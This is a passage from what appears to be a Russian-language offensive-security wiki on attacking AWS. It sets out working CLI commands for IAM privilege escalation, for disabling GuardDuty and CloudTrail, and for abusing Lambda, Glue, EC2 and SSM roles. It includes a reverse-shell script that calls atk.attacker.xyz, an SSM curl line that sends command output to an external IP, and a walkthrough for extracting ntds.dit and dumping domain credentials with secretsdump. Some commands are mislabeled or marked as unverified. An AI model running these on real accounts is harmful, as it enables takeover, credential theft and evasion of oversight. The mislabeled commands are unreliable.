Сбросить пароль у других пользователей:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam update-login-profile --user-name target_user --password '|[3rxYGGl3@`~68)O{,-$1B”zKejZZ.X1;6T}<XT5isoE=LB2L^G@{uK>f;/CQQeXSo>}th)KZ7v?\\hq.#@dh49″=fT;|,lyTKOLG7J[qH$LV5U<9`O~Z”,jJ[iT-D^(' --no-password-reset-required
</syntaxhighlight>

==== iam:PassRole + ec2:RunInstance ====

См. EC2

==== iam:PassRole + glue:CreateDevEndpoint ====

См. Glue

==== iam:PutRolePolicy ====

Создать или обновить inline-политику для роли.

==== iam:PutGroupPolicy ====

Создать или обновить inline-политику для группы.

==== iam:PuserUserPolicy ====

Создать или обновить inline-политику.

==== iam:UpdateAssumeRolePolicy + sts:AssumeRole ====

Обновить документ "AssumeRolePolicyDocument" для роли.

=== Роли - повышение до админа ===

==== iam:AddUserToGroup ====

Добавить юзера в административную группу:

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam add-user-to-group --group-name <название_группы> --user-name <логин>
</syntaxhighlight>

==== iam:PutUserPolicy ====

Право добавить своб политику к ранее скомпрометированным обьектам.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam put-user-policy --user-name <логин> --policy-name my_inline_policy --policy-document file://path/to/administrator/policy.json
</syntaxhighlight>

==== iam:CreateLoginProfile ====

Привилегия для создания профиля(с паролем) для аккаунта, выставить новый пароль и перейти под этого пользователя.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam create-login-profile --user-name target_user –password '|[3rxYGGl3@`~68)O{,-$1B”zKejZZ.X1;6T}<XT5isoE=LB2L^G@{uK>f;/CQQeXSo>}th)KZ7v?\\hq.#@dh49″=fT;|,lyTKOLG7J[qH$LV5U<9`O~Z”,jJ[iT-D^(' --no-password-reset-required
</syntaxhighlight>

==== iam:UpdateLoginProfile ====

Добавить существующую политику к любому пользователю.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-user-policy --user-name my_username --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:AttachGroupPolicy ====

Добавить существующую политику к любой группе.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-user-policy --user-name my_username --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:AttachRolePolicy ====

Добавить существующую политику к любой роли.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-role-policy --role-name role_i_can_assume --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:CreatePolicy ====

Создать административную политику.

==== iam:CreatePolicyVersion + iam:SetDefaultPolicyVersion ====

Позволяет поменять политику, выставленную администраторами сети и применить ее, после чего повысить привилегии у обьекта.

Например, если у вас это право, то вы можете создать произвольную политику, дающую полный доступ и применить ее.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание политики
aws iam create-policy-version --policy-arn target_policy_arn --policy-document file://path/to/administrator/policy.json --set-as-default
# Установка политики по умолчанию.
aws iam set-default-policy-version –policy-arn target_policy_arn –version-id v2
</syntaxhighlight>

==== iam:PassRole + ec2:CreateInstanceProfile/ec2:AddRoleToInstanceProfile ====

См. EC2

==== iam:AttachUserPolicy ====

Позволяет прикрепить политику к пользователю. Если существует политика, дающая админские права - повышение.

== AWS Shield ==

Сервис для защиты от DDoS.

== Cognito ==

Позволяет быстро и просто добавлять возможности регистрации, авторизации и контроля доступа пользователей в мобильные и интернет-приложения.

=== Основное ===

Cognito отвечает за следующие действия:

* Регистрация пользователя (email + пароль)

* Авторизация пользователя

* Работа с сохраненной пользовательской информацией (устанавливается приложением)

* Специальные действия (например, предоставление AWS-ключей)

Все общение идет по HTTP(s). Особенность системы в том, что Cognito общается как напрямую с чужим веб-сайтом, так и напрямую с клиентским браузером. То есть веб-сервер не знает, какой был передан пароль (в нормальной реализации).

Пример URL: cognito-identity.us-east-1.amazonaws.com

За действие отвечает HTTP-заголовок "X-Amz-Target". В своем роде, это Endpoints API.

Какие параметры требуются для работы с ним:

1. Название Endpoint'а - "X-Amz-Target" заголовок

2. Регион - "aws_project_region" параметр

3. Session token - позже требуется для запросов.

4. Identity Pool ID - нужен для запросов типа Identity Pools.

Также пишут, что Cognito разделяется на две основные части:

* User Pools - для тех, кому нужна только регистрация и аутентификация

* Identity Pools - для тех, кому еще и нужен доступ к AWS-ресурсам.

=== X-Amz-Target (Endpoints) ===

==== AWSCognitoIdentityService.UpdateUserAttributes ====

У каждого пользователя есть поля, которые могут быть установлены самим пользователем (например, фамилия или дата рождения). Но также это могут быть и критичные поля, такие, как ID пользователя, администратор ли он и так далее.

Также раньше можно было менять поле email'а пользователя (0day): https://infosecwriteups.com/hacking-aws-cognito-misconfiguration-to-zero-click-account-takeover-36a209a0bd8a

Важно! Указано, что могут быть отправки СМС-уведомлений, так что тестировать осторожно.

P.S. Мб неверно название Endpoint'а. Надо проверять.

==== AWSCognitoIdentityService.GetCredentialsForIdentity ====

Позволяет получить AWS ключи для работы с AWS-консолью. По-умолчанию отключено.

Требуется aws_identity_pool_id.

В некоторых примерах оно также было указано как "com.amazonaws.cognito.identity.model.AWSCognitoIdentityService.GetCredentialsForIdentity"

Подробнее тут: https://blog.appsecco.com/exploiting-weak-configurations-in-amazon-cognito-in-aws-471ce761963

==== AWSCognitoIdentityService.GetOpenIdToken ====

Позволяет получить OpenID токен, действительный на 10 минут.

В примере требуется только "IdentityID"

==== AWSCognitoIdentityService.GetOpenIdTokenForDeveloperIdentity ====

Тоже позволяет получить OpenID токен, действительный на 10 минут. Но также создает новый "IdentityID" (если он не был указан).

==== AWSCognitoIdentityService.GetCredentialsForIdentity ====

Получить учетные данные пользователя по IdentityID: SecretKey, SessionToken, AccessKeyID.

https://docs.aws.amazon.com/cognitoidentity/latest/APIReference/API_GetCredentialsForIdentity.html

== GuardDuty ==

Сервис для детектирования атак используя машинное обучение.

Для детекта использует следующие сервисы:

* CloudTrail
* VPC Flow Logs
* DNS Logs
* ...to be continued

=== Обход защиты ===

Далее идут правила детекта и то, как их можно обойти.

==== UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration ====

Детектит, если AWS-API команды были запущены за пределами EC2 (используя токен этого EC2).

Правило эффективно, если хакер хочет украть токен с EC2 и использовать его вне EC2 (например, если есть только SSRF).

Обход простой: создать свой EC2-инстанс и делать API-запросы с полученными учетными данными жертвы.
Тогда правило не сработает, даже если учетные данные не принадлежат данной EC2 тк правило проверяет source ip и является ли он EC2.

Может быть для этого выгодно держать проксирующий сервер EC2.

==== UserAgent rules ====

Суть в том, что GuardDuty будет добавлять Alert если AWS-CLI использует UserAgent например Kali.
Варианты:

* Использовать утилиту pacu (уже есть смена User-Agent)

* Отредактировать botocore(https://github.com/boto/botocore) по пути /usr/local/lib/python3.7/dist-packages/botocore/session.py: поменять platform.release() на строку юзерагента.

=== Роли - Управление ===

Список ролей: https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazonguardduty.html

==== guardduty:UpdateDetector ====

Позволяет выключить GuardDuty (ну или редатировать правила):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
aws guardduty update-detector --detector-id <id of detector> --no-enable
</syntaxhighlight>
==== guardduty:DeleteDetector ====

Удалить правило детектирования:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
aws guardduty delete-detector --detector-id <id of detector>
</syntaxhighlight>

== STS (Security Token Service) ==

Сервис, позволяющий запросить временные учетные данные с ограниченными примилегиями для IAM-пользователей

== KMS (Key Management Service) ==

Сервис для создания криптографических ключей, управления ими и использования их в других сервисах.

Администраторы амазона не смогут получить к ним доступ.

Ключи со временем обновляются:

* Customers keys - раз в 365 дней

* AWS keys - раз в 3 года.

Старые ключи также можно будет использовать для расшифровки.

== CloudHSM (Hardware Security Module) ==

Замена KMS для богатых и тех, кто хочит побольше безопасности. Хранилище ключей, прикрепленное к аппаратному решению.

Пишут, что устройство будет закреплено только за вами.

Также можно получить доступ к CloudHSM-Instance по SSH.

== Athena ==

Интерактивный бессерверный сервис, позволяющий анализировать данные хранилища S3 стандартными средствами SQL.

Умеет работать с шифрованными S3 и сохранять шифрованный вывод.

== EBS (Elastic Block Store) ==

Сервис блочного хранилища (просто жесткий диск, который можно примонтировать).

=== Роли - управление сервисом ===

==== ec2:CreateVolume + ec2:AttachVolume ====

Возможность подключить EBS-Volume/Snapshot к EC2-виртуалке.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание Volume из snapshot'а (если требуется подключить snapshot)
aws ec2 create-volume –snapshot-id snapshot_id --availability-zone zone
# Подключение Volume к виртуалке EC2
</syntaxhighlight>

Далее идем на виртуалку и вводим команды:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Поиск Volume
lsblk
# Проверка есть ли на нем данные
sudo file -s /dev/xvdf
# форматировать образ под ext4 (если неподходящая файловая система)
sudo mkfs -t ext4 /dev/xvdf
# Создаем директорию куда примонтируем позже
sudo mkdir /tmp/newvolume
# Монтируем
sudo mount /dev/xvdf /tmp/newvolume/
</syntaxhighlight>

Диск будет доступен на /tmp/newvolume.

== Lambda ==

Сервис для запуска своего кода в облаке.

=== Роли - повышение привилегий ===

==== lambda:UpdateFunctionCode ====

Позволяет поменять запущенный код, тем самым получив контроль над ролями, прикрепленными к этому коду:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws lambda update-function-code --function-name target_function --zip-file fileb://my/lambda/code/zipped.zip
</syntaxhighlight>

==== lambda:CreateFunction + lambda:InvokeFunction + iam:PassRole ====

Позволяет создать функцию и прикрепить к ней произвольную роль, после чего запустить.

Код функции:
<syntaxhighlight lang="python" line="1" enclose="div" style="overflow-x:scroll" >
import boto3
def lambda_handler(event, context):
client = boto3.client('iam')
response = client.attach_user_policy(
UserName='my_username',
PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess"
)
return response
</syntaxhighlight>

Команды для запуска:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание функции
aws lambda create-function --function-name my_function --runtime python3.6 --role arn_of_lambda_role --handler lambda_function.lambda_handler --code file://my/python/code.py
# Запуск
aws lambda invoke --function-name my_function output.txt
</syntaxhighlight>

=== Роли - управление ===

==== lambda:GetFunction ====

Также может понадобиться lambda:ListFunctions чтобы не перебирать названия функций.

Позволяет прочитать исходный код функции (в котором например может быть секрет сохранен):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получить список функций
aws lambda list-functions --profile uploadcreds
# Получить информацию о Lambda-функции
aws lambda get-function --function-name "LAMBDA-NAME-HERE-FROM-PREVIOUS-QUERY" --query 'Code.Location' --profile uploadcreds
# Скачать исходный код по ссылке из предыдущего ответа
wget -O lambda-function.zip url-from-previous-query --profile uploadcreds
</syntaxhighlight>

== Glue ==

Бессерверная служба интеграции данных, упрощающая поиск, подготовку и объединение данных для анализа, машинного обучения и разработки приложений.

=== Роли - повышение привилегий ===

==== glue:UpdateDevEndpoint ====

Позволяет обновить параметры Glue Development Endpoint, тем самым получив контроль над ролями, прикрепленными к этому Glue Development Endpoint:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# TODO: это не обновление параметров, надо обновить команду
aws glue --endpoint-name target_endpoint --public-key file://path/to/my/public/ssh/key.pub
</syntaxhighlight>

==== glue:CreateDevEndpoint + iam:PassRole ====

Позволяет получить доступ к ролям, которые прикреплены к любому сервису Glue:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws glue create-dev-endpoint --endpoint-name my_dev_endpoint --role-arn arn_of_glue_service_role --public-key file://path/to/my/public/ssh/key.pub
</syntaxhighlight>

== S3 ==

Файловое хранилище, доступное по http(s).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{bucket_name}.s3.amazonaws.com
https://s3.amazonaws.com/{bucket_name}/

# US Standard
http://s3.amazonaws.com
# Ireland
http://s3-eu-west-1.amazonaws.com
# Northern California
http://s3-us-west-1.amazonaws.com
# Singapore
http://s3-ap-southeast-1.amazonaws.com
# Tokyo
http://s3-ap-northeast-1.amazonaws.com
</syntaxhighlight>

Делать запросы можно:

* В браузере - http(s)

* Используя awscli:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3 ls s3://flaws.cloud/ [--no-sign-request] [--profile <PROFILE_NAME>] [ --recursive] [--region us-west-2]
</syntaxhighlight>

В S3 может использоваться шифрование:

* SSE-KMS - Server-Side с ключами KMS

* SSE-C - Server-Side с ключами заказчика

* CSE-KMS - Client-Side с ключами KMS

* CSE-C - Client-Side с ключами заказчика

=== Сбор информации ===

==== Определение региона ====

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
$ dig flaws.cloud
;; ANSWER SECTION:
flaws.cloud. 5 IN A 52.218.192.11

$ nslookup 52.218.192.11
Non-authoritative answer:
11.192.218.52.in-addr.arpa name = s3-website-us-west-2.amazonaws.com

# Итоговый URL будет:
flaws.cloud.s3-website-us-west-2.amazonaws.com
flaws.cloud.s3-us-west-2.amazonaws.com
</syntaxhighlight>
Если будет некорректный регион - редиректнет на корректный.

==== Список файлов ====

На S3-Bukket может быть включен листинг директорий, для этого достаточно перейти в браузере на хранилище и посмотреть возвращенный XML.

Список файлов может быть включен отдельно на определенные директории, поэтому может потребоваться брут директорий используя, например, wfuzz (подстрока AccessDenied).

=== Роли - управление ===

==== s3:ListBucket ====

Посмотреть список файлов в S3-хранилище:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3 ls s3://flaws.cloud/ [--no-sign-request] [--profile <PROFILE_NAME>] [ --recursive] [--region us-west-2]
</syntaxhighlight>

==== s3:ListAllMyBuckets ====

Посмотреть список всех S3-хранилищ, доступных мне:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3api list-buckets
aws s3 ls
</syntaxhighlight>

== CloudFront ==

Сервис сети доставки контента (CDN).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.cloudfront.net
</syntaxhighlight>

== EC2 (Elastic Compute Cloud) ==

EC2 (Amazon Elastic Compute Cloud) == VPS

Состоит из:

* Instance - название виртуальной машины

* AMI (Amazon Machine Image) - образ виртуальной машины

* SSM Agent - программное обеспечение Amazon, которое запущено на всеx EC2-инстансах, серверах и тд.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
ec2-{ip-seperated}.compute-1.amazonaws.com
</syntaxhighlight>

=== SSM Agent ===

Как уже выше написано, SSM Agent - программное обеспечение Amazon, которое запущено на всеx EC2-инстансах, серверах и тд.

Его тоже можно выбрать целью атаки

==== MITM ====

Есть возможность вклиниваться в общение от SSM-Агента локально.

PoC: https://github.com/Frichetten/ssm-agent-research/tree/main/ssm-session-interception

Полная статья: https://frichetten.com/blog/ssm-agent-tomfoolery/

=== Роли - повышение привилегий ===

==== ec2:RunInstance + iam:PassRole ====

Позволяет прикрепить существующую роль к скомпрометированной EC2-машине.

1. Запуск машины c новой прикрепленной ролью

2. Подключение к ней

3. Работа с прикрепленной ролью

Создание EC2 с известным SSH-ключем:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 run-instances --image-id ami-a4dc46db --instance-type t2.micro --iam-instance-profile Name=iam-full-access-ip --key-name my_ssh_key --security-group-ids sg-123456
</syntaxhighlight>

Второй вариант - скрипт для запуска:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 run-instances --image-id ami-a4dc46db --instance-type t2.micro --iam-instance-profile Name=iam-full-access-ip --user-data file://script/with/reverse/shell.sh
</syntaxhighlight>

Важно! Может спалиться с GuardDuty когда учетные данные пользователя будут использованы на стороннем инстансе EC2.

=== Роли - повышение до админа ===

==== ec2:AssociateIamInstanceProfile ====

Позволяет менять IAM политики/роли/пользователей

==== ec2:CreateInstanceProfile/ec2:AddRoleToInstanceProfile + iam:PassRole ====

Позволяет создать новый привилегированный профиль для инстанса и прикрепить его к скомпрометированной EC2-машине.

=== Роли - управление ===

==== ec2:CreateVolume + ec2:AttachVolume ====

См. EBS.

==== ec2:DescribeSnapshots ====

Позволяет посмотреть информацию о SnapShot'ах, которые позже мб потребуется прочитать:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 describe-snapshots --profile flawscloud --owner-id 975426262029 --region us-west-2
</syntaxhighlight>

==== ec2:CreateVolume ====

Прзврояет примаунтить SnapShot, чтобы потом его изучить:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 create-volume --profile YOUR_ACCOUNT --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89
</syntaxhighlight>

==== ec2:* (Копирование EC2) ====

Позволяет скопировать EC2 используя AMI-images:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создаем новый AMI из Instance-ID
aws ec2 create-image --instance-id i-0438b003d81cd7ec5 --name "AWS Audit" --description "Export AMI" --region eu-west-1

# Добавляем наш ключ в систему
aws ec2 import-key-pair --key-name "AWS Audit" --public-key-material file://~/.ssh/id_rsa.pub --region eu-west-1

# Создаем EC2-Instance используя созданный AMI (параметры security group и подсеть оставили те же)
aws ec2 run-instances --image-id ami-0b77e2d906b00202d --security-group-ids "sg-6d0d7f01" --subnet-id subnet-9eb001ea --count 1 --instance-type t2.micro --key-name "AWS Audit" --query "Instances[0].InstanceId" --region eu-west-1

# Проверяем запустился ли инстанс
aws ec2 describe-instances --instance-ids i-0546910a0c18725a1

# Не обязательно - редактируем группу инстанса
aws ec2 modify-instance-attribute --instance-id "i-0546910a0c18725a1" --groups "sg-6d0d7f01" --region eu-west-1

# В конце работы - останавливаем и удаляем инстанс
aws ec2 stop-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
</syntaxhighlight>

==== ec2-instance-connect:SendSSHPublicKey ====

Добавить SSH-ключ к EC2-инстансу. Ключ будет существовать 60 секунд.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию об инстансе, который будем атаковать.
aws ec2 describe-instances --profile uploadcreds --region eu-west-1 | jq ".[][].Instances | .[] | {InstanceId, KeyName, State}"

# Добавляем ключ к EC2-инстансу.
aws ec2-instance-connect send-ssh-public-key --region us-east-1 --instance-id INSTANCE --availability-zone us-east-1d --instance-os-user ubuntu --ssh-public-key file://shortkey.pub --profile uploadcreds</syntaxhighlight>

==== ec2-instance-connect:SendSerialConsoleSSHPublicKey ====

Добавить SSH-ключ к EC2-инстансу. Ключ будет существовать 60 секунд.

В отличие от предыдущего пункта, этот ключ можно использовать только при подключении EC2 Serial Console.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию об инстансе, который будем атаковать.
aws ec2 describe-instances --profile uploadcreds --region eu-west-1 | jq ".[][].Instances | .[] | {InstanceId, KeyName, State}"

# Добавляем ключ к EC2-инстансу.
aws ec2-instance-connect send-serial-console-ssh-public-key --instance-id i-001234a4bf70dec41EXAMPLE --serial-port 0 --ssh-public-key file://my_key.pub --region us-east-1

# Подключаемся (кроме GovCloud US региона)
ssh -i my_key i-001234a4bf70dec41EXAMPLE.port0@serial-console.ec2-instance-connect.us-east-1.aws
# Подключаемся (только для GovCloud US региона)
ssh -i my_key i-001234a4bf70dec41EXAMPLE.port0@serial-console.ec2-instance-connect.us-gov-east-1.amazonaws.com

# В некоторых случаях нужно подключиться к EC2 и перезагрузить сервис getty (лучше пробовать только, когда не смогли подключиться)
sudo systemctl restart serial-getty@ttyS0
# Если не сработало - мб требуется ребутать сервер.
</syntaxhighlight>

Также можно подключиться, используя браузер. Подробнее тут: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/connect-to-serial-console.html

==== ssm:SendCommand ====

Позволяет запускать команды в EC2-Instances. Если нет дополнительных прав, то потребуется:

* Знать Instance-ID, на котором запущен сервис SSM

* Свой сервер, на который будет приходить отстук - результат команды.

Команды для эксплуатации:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию о SSM сервисах - может потребоваться ssm:DescribeInstanceInformation
aws ssm describe-instance-information --profile stolencreds --region eu-west-1
# Выполняем команду
aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters commands=ifconfig --output text --query "Command.CommandId" --profile stolencreds
# Получаем результат команды(может не хватить прав ssm:ListCommandInvocations)
aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}" --profile stolencreds

# Пример - результат команды на удаленный сервер
$ aws ssm send-command --instance-ids "i-05b████████adaa" --document-name "AWS-RunShellScript" --comment "whoami" --parameters commands='curl 162.243.███.███:8080/`whoami`' --output text --region=us-east-1
</syntaxhighlight>

==== EC2:CreateSnapshot + Active Directory ====

См. AD.

== Auto Scaling (autoscaling) ==

Сервис для масштабирования приложений. Работает преимущественно с EC2, ECS, DynamoDB (таблицы и индексы) и Aurora.

Для работы сервиса требуется:

1. Конфигурация запуска EC2.

2. Конфигурация масштабирования.

== Роли - повышение привилегий ==

=== autoscaling:CreateLaunchConfiguration + autoscaling:Create(Update)AutoScalingGroup + iam:PassRole ===

Позволяет создать и запустить конфигурацию масштабирования.

==== Создаем конфигурацию запуска EC2 ====

Для создания требуется:

1. Image-id

2. iam-instance-profile

Следующая команда создает конфигурацию с командой из файла reverse-shell.sh:

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws autoscaling create-launch-configuration --launch-configuration-name demo3-LC --image-id ami-0f90b6b11936e1083 --instance-type t1.micro --iam-instance-profile demo-EC2Admin --metadata-options "HttpEndpoint=enabled,HttpTokens=optional" --associate-public-ip-address --user-data=file://reverse-shell.sh
</syntaxhighlight>

Пример содержимого reverse-shell.sh:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
#!/bin/bash
/bin/bash -l > /dev/tcp/atk.attacker.xyz/443 0<&1 2>&1
</syntaxhighlight>

==== Создаем и запускаем группу масштабируемости ====

Привилегия ec2:DescribeSubnets нужна для выбора нужной сети (чтобы EC2 смог сделать reverse-соедиенение к нам).

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws autoscaling create-auto-scaling-group --auto-scaling-group-name demo3-ASG --launch-configuration-name demo3-LC --min-size 1 --max-size 1 --vpc-zone-identifier "subnet-aaaabbb"
</syntaxhighlight>

Подробнее тут https://notdodo.medium.com/aws-ec2-auto-scaling-privilege-escalation-d518f8e7f91b

== AD (Directory Service) ==

Второе название - AWS Managed Microsoft Active Directory. Позволяет использовать Active Directory в AWS.

Основные понятия:

* EC2-Instance - VPS на которых крутится весь Active Directory

=== Роли - повышение привилегий ===

==== EC2:CreateSnapshot + EC2:RunInstance -> ShadowCopy ====

Позволяет провести атаку ShadowCopy на доменный контроллер и считать учетные данные всех пользователей.

Последовательность атаки:

1. Получаем список инстансов

2. Создаем Snapshot выбранного сервера

3. Редактируем атрибуты у SnapShot для доступа с аккаунта атакующего.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 modify-snapshot-attribute --snapshot-id snap-1234567890abcdef0 --attribute createVolumePermission --operation-type remove --user-ids 123456789012
</syntaxhighlight>

4. Переключаемся на аккаунт атакующего

5. Создаем новый Linux EC2-инстанс, к которому будет прикреплен SnapShot

6. Подключаемся по SSH и получаем данные из SnapShot
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
sudo -s
mkdir /tmp/windows
mount /dev/xvdf1 /tmp/windows/
cd /tmp/windows/
</syntaxhighlight>

7. Работаем с данными на примонтированном диске, который будет в /tmp/windows/. Пример команд для извлечения ntds.dit:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
cp /windows/Windows/NTDS/ntds.dit /home/ec2-user
cp /windows/Windows/System32/config/SYSTEM /home/ec2-user
chown ec2-user:ec2-user /home/ec2-user/*
# Sftp - скачиваем файлы:
/home/ec2-user/SYSTEM
/home/ec2-user/ntds.dit
# Получаем учетные данные, используя Impacket-secretsdump
secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets
</syntaxhighlight>

== CloudTrail ==

Сервис для аудита событий в AWS-аккаунте (включен в каждом аккаунте по-умолчанию). Сервис позволяет вести журналы, осуществлять непрерывный мониторинг и сохранять информацию об истории аккаунта в пределах всей используемой инфраструктуры AWS.

Записывает:

* API-вызовы

* Логины в систему

* События сервисов

* ???

Важен при операциях RedTeam.

Название файла логов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
AccountID_CloudTrail_RegionName_YYYYMMDDTHHmmZ_UniqueString.FileNameFormat
</syntaxhighlight>

S3 путь до логов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
BucketName/prefix/AWSLogs/AccountID/CloudTrail/RegionName/YYYY/MM/DD
</syntaxhighlight>

Путь у CloudTrail-Digest файлов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
s3://s3-bucket-name/optional-prefix/AWSLogs/aws-account-id/CloudTrail-Digest/region/digest-end-year/digest-end-month/digest-end-data/aws-account-id_CloudTrail-Digest_region_trail-name_region_digest_end_timestamp.json.gz
</syntaxhighlight>

Основные поля у событий:

* eventName - имя API-endpoint

* eventSource - вызванный сервис

* eventTime - время события

* SourceIPAddress - ip-адрес источника

* userAgent - метод запроса
** "signing.amazonaws.com" - запрос от AWS Management Console
** "console.amazonaws.com" - запрос от root-пользователя аккаунта
** "lambda.amazonaws.com" - запрос от AWS Lambda

* requestParameters - параметры запроса

* responseElements - элементы ответа.

Временные параметры:

* 5 минут - сохраняется новый лог-файл

* 15 минут - сохраняется в S3.

Важно! Сохраняется чексумма файлов, поэтому пользователи могут удостовериться что логи не менялись.
Также логи могут уходить напрямую в CloudWatch - администраторам может прилететь уведомление об ИБ-инцидентах. Или события могут быть проанализированы внутренним модулем CloudTrail - Insights на предмет необычной активности.

=== Роли - управление ===

==== cloudtrail:DeleteTrail ====

Позволяет отключить мониторинг:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail delete-trail --name cloudgoat_trail --profile administrator
</syntaxhighlight>

==== cloudtrail:UpdateTrail ====

Права на редактирование правил монитринга.

Отключить мониторинг глобальных сервисов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event
</syntaxhighlight>

Отключить мониторинг на конкретные регионы:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event --no-is-multi-region --region=eu-west
</syntaxhighlight>

==== validate-logs ====

Проверить, были ли изменены логи.

aws cloudtrail validate-logs --trail-arn <trailARN> --start-time <start-time> [--end-time <end-time>] [--s3-bucket <bucket-name>] [--s3-prefix <prefix>] [--verbose]

=== Эксплуатация ===

==== Обход правила по UserAgent ====

На сервисе есть правило, по которому определяет, что запросы были сделаны с kali/parrot/pentoo используя awscli.

Для этого можно воспользоваться утилитой pacu, которая автоматически подменяет useragent. Использование утилиты в конце статьи.

== DynamoDB ==

Cистема управления базами данных класса NoSQL в формате «ключ — значение».

=== Роли - управление ===

==== dynamodb:ListTables ====

Позволяет посмотреть спрсок таблиц базы данных.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws --endpoint-url http://s3.bucket.htb dynamodb list-tables

{
"TableNames": [
"users"
]
}
</syntaxhighlight>

==== dynamodb:Scan ====

Получение обьектов из базы данных:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws --endpoint-url http://s3.bucket.htb dynamodb scan --table-name users | jq -r '.Items[]'

{
"password": {
"S": "Management@#1@#"
},
"username": {
"S": "Mgmt"
}
}
</syntaxhighlight>

== ES (ElasticSearch) ==

ElasticSearch от AWS. Используется для просмотра логов/журналов, поиска на вебсайте и тд.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{user_provided}-{random_id}.{region}.es.amazonaws.com
</syntaxhighlight>

== ELB (Elastic Load Balancing) ==

Балансировщик нагрузки.

Формат ссылки (elb_v1):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
http://{user_provided}-{random_id}.{region}.elb.amazonaws.com:80/443
</syntaxhighlight>

Формат ссылки (elb_v2):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{user_provided}-{random_id}.{region}.elb.amazonaws.com
</syntaxhighlight>

== RDS (Relational Database Service) ==

Облачная реляционная база данных (на выбор).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
mysql://{user_provided}.{random_id}.{region}.rds.amazonaws.com:3306
postgres://{user_provided}.{random_id}.{region}.rds.amazonaws.com:5432
</syntaxhighlight>

== Route 53 ==

Настраиваемая служба DNS.

Формат ссылки:
